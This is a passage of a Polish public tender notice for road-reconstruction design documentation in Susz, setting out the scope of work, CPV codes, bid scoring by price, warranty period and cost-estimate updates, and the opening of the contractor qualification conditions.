lata<br/>rękojmi - 10 punktów, 4 lata rękojmi - 20 punktów, 5 lat rękojmi - 30 punktów. b) Oferta z okresem rękojmi 5 lat i więcej – otrzyma<br/>maksymalną ilość punktów. Punkty zostaną przyznane na podstawie oświadczenia złożonego w pkt. 6 „Formularza ofertowego”<br/>(załącznik nr 1 do SWZ). Okres rękojmi należy podać w latach np. 2,3,4,5…itd. lat. 1.3) W kryterium „Aktualizacja kosztorysów<br/>inwestorskich” (Aki): Punkty za kryterium aktualizacja kosztorysów inwestorskich (Aki) - zostaną przyznane zgodnie z poniższym<br/>opisem: a) W ramach wynagrodzenia należnego Wykonawcy wymagane jest wykonanie co najmniej jednokrotnej aktualizacji<br/>kosztorysu inwestorskiego. Przez aktualizację zamawiający rozumie dokonanie aktualizacji cen zgodnie z wymogami art. 36 ust. 1<br/>ustawy Pzp, b) Za wykonanie dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum w okresie udzielonej<br/>rękojmi zostaną przyznane punkty w następujący sposób: za brak deklaracji (nie wpisanie w ogóle ilości aktualizacji lub wpisanie „0”)<br/>Wykonawcy w zakresie wykonania dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum – przyznane<br/>zostanie: 0 pkt.; za zadeklarowanie przez Wykonawcę wykonania 1 dodatkowej aktualizacji kosztorysów inwestorskich w okresie<br/>udzielonej rękojmi ponad wymagane minimum – przyznanych zostanie: 5 pkt.; za zadeklarowanie przez Wykonawcę wykonania 2 lub<br/>więcej dodatkowych aktualizacji kosztorysów inwestorskich w okresie udzielonej rękojmi ponad wymagane minimum – przyznanych<br/>zostanie: 10 pkt. Punkty zostaną przyznane na podstawie oświadczenia w pkt. 7 „Formularza ofertowego” (załącznik nr 1 do SWZ).<br/>Oferowana dodatkowa (ponad 1 obowiązkową) ilość bezpłatnych aktualizacji kosztorysów inwestorskich należy podać w liczbie np.<br/>0,1,2,3,…itd. 2. Ocenę oferty (Of) stanowi suma punktów określona dla poszczególnych kryteriów wg wzoru: Of= C + Or + Aki gdzie:<br/>Of- ilość punktów uzyskana przez ofertę badaną; C- ilość punktów uzyskana przez ofertę w kryterium cena; Or- ilość punktów<br/>uzyskana przez ofertę w kryterium okres rękojmi; Aki – ilość punktów uzyskana przez ofertę w kryterium aktualizacja kosztorysów<br/>inwestorskich. 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów tj. przedstawiająca<br/>najkorzystniejszy bilans kryteriów oceny ofert wg powyższego wzoru. Zamawiający może przyznać Wykonawcy maksymalnie 100<br/>punktów. 6. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. 7. Obliczenia dokonywane będą z<br/>dokładnością do dwóch miejsc po przecinku, z zachowaniem na-stępującej zasady: jeżeli parametr miejsca tysięcznego jest poniżej<br/>5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aktualizacja kosztorysów inwestorskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania pod nazwą: „Przebudowa ul. Leśnej w Suszu”. <br/>Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej dla przebudowy/budowy jezdni na ul. Leśnej w Suszu.<br/>W zakres usługi wchodzi:<br/>1/ przygotowanie mapy do celów projektowych;<br/>2/ wykonanie inwentaryzacji budowlanej;<br/>3/ uzyskanie wszelkich koniecznych uzgodnień wymaganych prawem;<br/>4/ opracowanie projektu budowlanego wstępnego/ koncepcji do akceptacji przez Zamawiającego;<br/>5/ opracowanie projektu technicznego przebudowy ulicy osiedle Leśnej w Suszu;<br/>6/ wykonanie kosztorysu inwestorskiego z podziałem na branże drogowa, sanitarna – 1 egz. drukowany;<br/>7/ wykonanie kosztorysu inwestorskiego z zapisem elektronicznym na płycie CD – 1 egz.;<br/>8/ wykonanie przedmiaru robót do celów przetargowych z zapisem elektronicznym na płycie CD – 1 egz. z możliwością edycji;<br/>9/ dostarczenie płyty CD z zapisem dokumentacji wykonawczej w formacie PDF;<br/>10/ dostarczenie specyfikacji technicznego wykonania i odbioru robót – 1 egz. drukowany;<br/>11/ dostarczenie specyfikacji technicznego wykonania i odbioru robót na płycie CD;<br/>12/ uzyskanie decyzji pozwolenia na budowę lub zgłoszenia do Starostwa Powiatowego z zaświadczeniem o braku sprzeciwu organu administracyjno-budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zasady oceny ofert w poszczególnych kryteriach: 1.1) W kryterium „Cena” (C)= cena najniższa brutto (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / cena brutto oferty badanej x 60 pkt. Porównywaną ceną będzie<br/>cena brutto ogółem za realizację zamówienia obliczonej przez Wykonawcę zgodnie z przepisami prawa i podanej w „Formularzu<br/>ofertowym” (załączniku nr 1 do SWZ). Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty. 1.2) W kryterium „Okres rękojmi” (Or): Punkty za kryterium „Okres rękojmi” (Or) - zostaną przyznane<br/>zgodnie z poniższym opisem: a) Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego okresu rękojmi na wykonane<br/>prace projektowe zastrzegając, iż minimalny okres rękojmi wynosi 2 lata wg poniższego wzoru: 2 lata rękojmi - 0 punktów, 3 lata<br/>rękojmi - 10 punktów, 4 lata rękojmi - 20 punktów, 5 lat rękojmi - 30 punktów. b) Oferta z okresem rękojmi 5 lat i więcej – otrzyma<br/>maksymalną ilość punktów. Punkty zostaną przyznane na podstawie oświadczenia złożonego w pkt. 6 „Formularza ofertowego”<br/>(załącznik nr 1 do SWZ). Okres rękojmi należy podać w latach np. 2,3,4,5…itd. lat. 1.3) W kryterium „Aktualizacja kosztorysów<br/>inwestorskich” (Aki): Punkty za kryterium aktualizacja kosztorysów inwestorskich (Aki) - zostaną przyznane zgodnie z poniższym<br/>opisem: a) W ramach wynagrodzenia należnego Wykonawcy wymagane jest wykonanie co najmniej jednokrotnej aktualizacji<br/>kosztorysu inwestorskiego. Przez aktualizację zamawiający rozumie dokonanie aktualizacji cen zgodnie z wymogami art. 36 ust. 1<br/>ustawy Pzp, b) Za wykonanie dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum w okresie udzielonej<br/>rękojmi zostaną przyznane punkty w następujący sposób: za brak deklaracji (nie wpisanie w ogóle ilości aktualizacji lub wpisanie „0”)<br/>Wykonawcy w zakresie wykonania dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum – przyznane<br/>zostanie: 0 pkt.; za zadeklarowanie przez Wykonawcę wykonania 1 dodatkowej aktualizacji kosztorysów inwestorskich w okresie<br/>udzielonej rękojmi ponad wymagane minimum – przyznanych zostanie: 5 pkt.; za zadeklarowanie przez Wykonawcę wykonania 2 lub<br/>więcej dodatkowych aktualizacji kosztorysów inwestorskich w okresie udzielonej rękojmi ponad wymagane minimum – przyznanych<br/>zostanie: 10 pkt. Punkty zostaną przyznane na podstawie oświadczenia w pkt. 7 „Formularza ofertowego” (załącznik nr 1 do SWZ).<br/>Oferowana dodatkowa (ponad 1 obowiązkową) ilość bezpłatnych aktualizacji kosztorysów inwestorskich należy podać w liczbie np.<br/>0,1,2,3,…itd. 2. Ocenę oferty (Of) stanowi suma punktów określona dla poszczególnych kryteriów wg wzoru: Of= C + Or + Aki gdzie:<br/>Of- ilość punktów uzyskana przez ofertę badaną; C- ilość punktów uzyskana przez ofertę w kryterium cena; Or- ilość punktów<br/>uzyskana przez ofertę w kryterium okres rękojmi; Aki – ilość punktów uzyskana przez ofertę w kryterium aktualizacja kosztorysów<br/>inwestorskich. 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów tj. przedstawiająca<br/>najkorzystniejszy bilans kryteriów oceny ofert wg powyższego wzoru. Zamawiający może przyznać Wykonawcy maksymalnie 100<br/>punktów. 6. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. 7. Obliczenia dokonywane będą z<br/>dokładnością do dwóch miejsc po przecinku, z zachowaniem na-stępującej zasady: jeżeli parametr miejsca tysięcznego jest poniżej<br/>5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aktualizacja kosztorysów inwestorskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania pod nazwą: „Przebudowa ul. Magnolii w Suszu”. Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej dla przebudowy/budowy jezdni na ul. Magnolii w Suszu.<br/>W zakres usługi wchodzi:<br/>1/ przygotowanie mapy do celów projektowych;<br/>2/ wykonanie inwentaryzacji budowlanej;<br/>3/ uzyskanie wszelkich koniecznych uzgodnień wymaganych prawem;<br/>4/ opracowanie projektu budowlanego wstępnego/ koncepcji do akceptacji przez Zamawiającego;<br/>5/ opracowanie projektu technicznego przebudowy ulicy Magnolii w Suszu;<br/>6/ wykonanie kosztorysu inwestorskiego z podziałem na branże– 1 egz. drukowany;<br/>7/ wykonanie kosztorysu inwestorskiego z zapisem elektronicznym na płycie CD – 1 egz.;<br/>8/ wykonanie przedmiaru robót do celów przetargowych z zapisem elektronicznym na płycie CD – 1 egz. z możliwością edycji;<br/>9/ dostarczenie płyty CD z zapisem dokumentacji wykonawczej w formacie PDF;<br/>10/ dostarczenie specyfikacji technicznego wykonania i odbioru robót – 1 egz. drukowany;<br/>11/ dostarczenie specyfikacji technicznego wykonania i odbioru robót na płycie CD;<br/>12/ uzyskanie decyzji pozwolenia na budowę lub zgłoszenia do Starostwa Powiatowego z zaświadczeniem o braku sprzeciwu organu administracyjno-budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zasady oceny ofert w poszczególnych kryteriach: 1.1) W kryterium „Cena” (C)= cena najniższa brutto (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / cena brutto oferty badanej x 60 pkt. Porównywaną ceną będzie<br/>cena brutto ogółem za realizację zamówienia obliczonej przez Wykonawcę zgodnie z przepisami prawa i podanej w „Formularzu<br/>ofertowym” (załączniku nr 1 do SWZ). Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty. 1.2) W kryterium „Okres rękojmi” (Or): Punkty za kryterium „Okres rękojmi” (Or) - zostaną przyznane<br/>zgodnie z poniższym opisem: a) Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego okresu rękojmi na wykonane<br/>prace projektowe zastrzegając, iż minimalny okres rękojmi wynosi 2 lata wg poniższego wzoru: 2 lata rękojmi - 0 punktów, 3 lata<br/>rękojmi - 10 punktów, 4 lata rękojmi - 20 punktów, 5 lat rękojmi - 30 punktów. b) Oferta z okresem rękojmi 5 lat i więcej – otrzyma<br/>maksymalną ilość punktów. Punkty zostaną przyznane na podstawie oświadczenia złożonego w pkt. 6 „Formularza ofertowego”<br/>(załącznik nr 1 do SWZ). Okres rękojmi należy podać w latach np. 2,3,4,5…itd. lat. 1.3) W kryterium „Aktualizacja kosztorysów<br/>inwestorskich” (Aki): Punkty za kryterium aktualizacja kosztorysów inwestorskich (Aki) - zostaną przyznane zgodnie z poniższym<br/>opisem: a) W ramach wynagrodzenia należnego Wykonawcy wymagane jest wykonanie co najmniej jednokrotnej aktualizacji<br/>kosztorysu inwestorskiego. Przez aktualizację zamawiający rozumie dokonanie aktualizacji cen zgodnie z wymogami art. 36 ust. 1<br/>ustawy Pzp, b) Za wykonanie dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum w okresie udzielonej<br/>rękojmi zostaną przyznane punkty w następujący sposób: za brak deklaracji (nie wpisanie w ogóle ilości aktualizacji lub wpisanie „0”)<br/>Wykonawcy w zakresie wykonania dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum – przyznane<br/>zostanie: 0 pkt.; za zadeklarowanie przez Wykonawcę wykonania 1 dodatkowej aktualizacji kosztorysów inwestorskich w okresie<br/>udzielonej rękojmi ponad wymagane minimum – przyznanych zostanie: 5 pkt.; za zadeklarowanie przez Wykonawcę wykonania 2 lub<br/>więcej dodatkowych aktualizacji kosztorysów inwestorskich w okresie udzielonej rękojmi ponad wymagane minimum – przyznanych<br/>zostanie: 10 pkt. Punkty zostaną przyznane na podstawie oświadczenia w pkt. 7 „Formularza ofertowego” (załącznik nr 1 do SWZ).<br/>Oferowana dodatkowa (ponad 1 obowiązkową) ilość bezpłatnych aktualizacji kosztorysów inwestorskich należy podać w liczbie np.<br/>0,1,2,3,…itd. 2. Ocenę oferty (Of) stanowi suma punktów określona dla poszczególnych kryteriów wg wzoru: Of= C + Or + Aki gdzie:<br/>Of- ilość punktów uzyskana przez ofertę badaną; C- ilość punktów uzyskana przez ofertę w kryterium cena; Or- ilość punktów<br/>uzyskana przez ofertę w kryterium okres rękojmi; Aki – ilość punktów uzyskana przez ofertę w kryterium aktualizacja kosztorysów<br/>inwestorskich. 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów tj. przedstawiająca<br/>najkorzystniejszy bilans kryteriów oceny ofert wg powyższego wzoru. Zamawiający może przyznać Wykonawcy maksymalnie 100<br/>punktów. 6. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. 7. Obliczenia dokonywane będą z<br/>dokładnością do dwóch miejsc po przecinku, z zachowaniem na-stępującej zasady: jeżeli parametr miejsca tysięcznego jest poniżej<br/>5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aktualizacja kosztorysów inwestorskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej dla zadania pod nazwą: „Przebudowa ul. Szewskiej i Kościuszki”.<br/>Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej dla przebudowy/budowy jezdni na ul. Szewskiej i Kościuszki w Suszu.<br/> Przedmiot umowy obejmuje wykonanie:<br/>1/ przygotowanie mapy do celów projektowych;<br/>2/ wykonanie inwentaryzacji budowlanej;<br/>3/ uzyskanie wszelkich koniecznych uzgodnień wymaganych prawem;<br/>4/ opracowanie projektu budowlanego wstępnego/ koncepcji do akceptacji przez Zamawiającego;<br/>5/ opracowanie projektu technicznego przebudowy ulic Szewskiej i Kościuszki w Suszu;<br/>6/ wykonanie kosztorysu inwestorskiego z podziałem na branże drogowa, sanitarna i wodociągowa – 1 egz. drukowany;<br/>7/ wykonanie kosztorysu inwestorskiego z zapisem elektronicznym na płycie CD – 1 egz.;<br/>8/ wykonanie przedmiaru robót do celów przetargowych z zapisem elektronicznym na płycie CD – 1 egz. z możliwością edycji;<br/>9/ dostarczenie płyty CD z zapisem dokumentacji wykonawczej w formacie PDF;<br/>10/ dostarczenie specyfikacji technicznego wykonania i odbioru robót – 1 egz. drukowany;<br/>11/ dostarczenie specyfikacji technicznego wykonania i odbioru robót na płycie CD;<br/>12/ uzyskanie decyzji pozwolenia na budowę lub zgłoszenia do Starostwa Powiatowego z zaświadczeniem o braku sprzeciwu organu administracyjno-budowlanego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71327000-6 - Usługi projektowania konstrukcji nośnych</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zasady oceny ofert w poszczególnych kryteriach: 1.1) W kryterium „Cena” (C)= cena najniższa brutto (spośród wszystkich złożonych ofert niepodlegających odrzuceniu) / cena brutto oferty badanej x 60 pkt. Porównywaną ceną będzie<br/>cena brutto ogółem za realizację zamówienia obliczonej przez Wykonawcę zgodnie z przepisami prawa i podanej w „Formularzu<br/>ofertowym” (załączniku nr 1 do SWZ). Określona w ten sposób cena oferty służyć będzie wyłącznie do porównania ofert i wyboru<br/>najkorzystniejszej oferty. 1.2) W kryterium „Okres rękojmi” (Or): Punkty za kryterium „Okres rękojmi” (Or) - zostaną przyznane<br/>zgodnie z poniższym opisem: a) Oferty w tym kryterium oceniane będą w odniesieniu do najdłuższego okresu rękojmi na wykonane<br/>prace projektowe zastrzegając, iż minimalny okres rękojmi wynosi 2 lata wg poniższego wzoru: 2 lata rękojmi - 0 punktów, 3 lata<br/>rękojmi - 10 punktów, 4 lata rękojmi - 20 punktów, 5 lat rękojmi - 30 punktów. b) Oferta z okresem rękojmi 5 lat i więcej – otrzyma<br/>maksymalną ilość punktów. Punkty zostaną przyznane na podstawie oświadczenia złożonego w pkt. 6 „Formularza ofertowego”<br/>(załącznik nr 1 do SWZ). Okres rękojmi należy podać w latach np. 2,3,4,5…itd. lat. 1.3) W kryterium „Aktualizacja kosztorysów<br/>inwestorskich” (Aki): Punkty za kryterium aktualizacja kosztorysów inwestorskich (Aki) - zostaną przyznane zgodnie z poniższym<br/>opisem: a) W ramach wynagrodzenia należnego Wykonawcy wymagane jest wykonanie co najmniej jednokrotnej aktualizacji<br/>kosztorysu inwestorskiego. Przez aktualizację zamawiający rozumie dokonanie aktualizacji cen zgodnie z wymogami art. 36 ust. 1<br/>ustawy Pzp, b) Za wykonanie dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum w okresie udzielonej<br/>rękojmi zostaną przyznane punkty w następujący sposób: za brak deklaracji (nie wpisanie w ogóle ilości aktualizacji lub wpisanie „0”)<br/>Wykonawcy w zakresie wykonania dodatkowych aktualizacji kosztorysu inwestorskiego ponad wymagane minimum – przyznane<br/>zostanie: 0 pkt.; za zadeklarowanie przez Wykonawcę wykonania 1 dodatkowej aktualizacji kosztorysów inwestorskich w okresie<br/>udzielonej rękojmi ponad wymagane minimum – przyznanych zostanie: 5 pkt.; za zadeklarowanie przez Wykonawcę wykonania 2 lub<br/>więcej dodatkowych aktualizacji kosztorysów inwestorskich w okresie udzielonej rękojmi ponad wymagane minimum – przyznanych<br/>zostanie: 10 pkt. Punkty zostaną przyznane na podstawie oświadczenia w pkt. 7 „Formularza ofertowego” (załącznik nr 1 do SWZ).<br/>Oferowana dodatkowa (ponad 1 obowiązkową) ilość bezpłatnych aktualizacji kosztorysów inwestorskich należy podać w liczbie np.<br/>0,1,2,3,…itd. 2. Ocenę oferty (Of) stanowi suma punktów określona dla poszczególnych kryteriów wg wzoru: Of= C + Or + Aki gdzie:<br/>Of- ilość punktów uzyskana przez ofertę badaną; C- ilość punktów uzyskana przez ofertę w kryterium cena; Or- ilość punktów<br/>uzyskana przez ofertę w kryterium okres rękojmi; Aki – ilość punktów uzyskana przez ofertę w kryterium aktualizacja kosztorysów<br/>inwestorskich. 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie najwyższą liczbę punktów tj. przedstawiająca<br/>najkorzystniejszy bilans kryteriów oceny ofert wg powyższego wzoru. Zamawiający może przyznać Wykonawcy maksymalnie 100<br/>punktów. 6. Jeżeli nie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans<br/>kryteriów oceny ofert, zamawiający spośród tych ofert wybiera ofertę z najniższą ceną. 7. Obliczenia dokonywane będą z<br/>dokładnością do dwóch miejsc po przecinku, z zachowaniem na-stępującej zasady: jeżeli parametr miejsca tysięcznego jest poniżej<br/>5 to parametr setny zaokrągla się w dół, jeżeli parametr miejsca tysięcznego jest 5 i powyżej to parametr setny zaokrągla się w górę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aktualizacja kosztorysów inwestorskich</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu <br/>na zasadach określonych w Rozdziale X SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że: <br/>2.1) Doświadczenie zawodowe:<br/>2.1.1.) Dla części 1 - w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej <br/>2 dokumentacje, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie. <br/>Przez „zadanie odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia należy rozumieć wykonanie projektów budowy, rozbudowy, przebudowy ciągów pieszo-rowerowych.<br/>2.1.2) Dla części 2, 3, 4 i 5 - w okresie ostatnich 3 lat przed 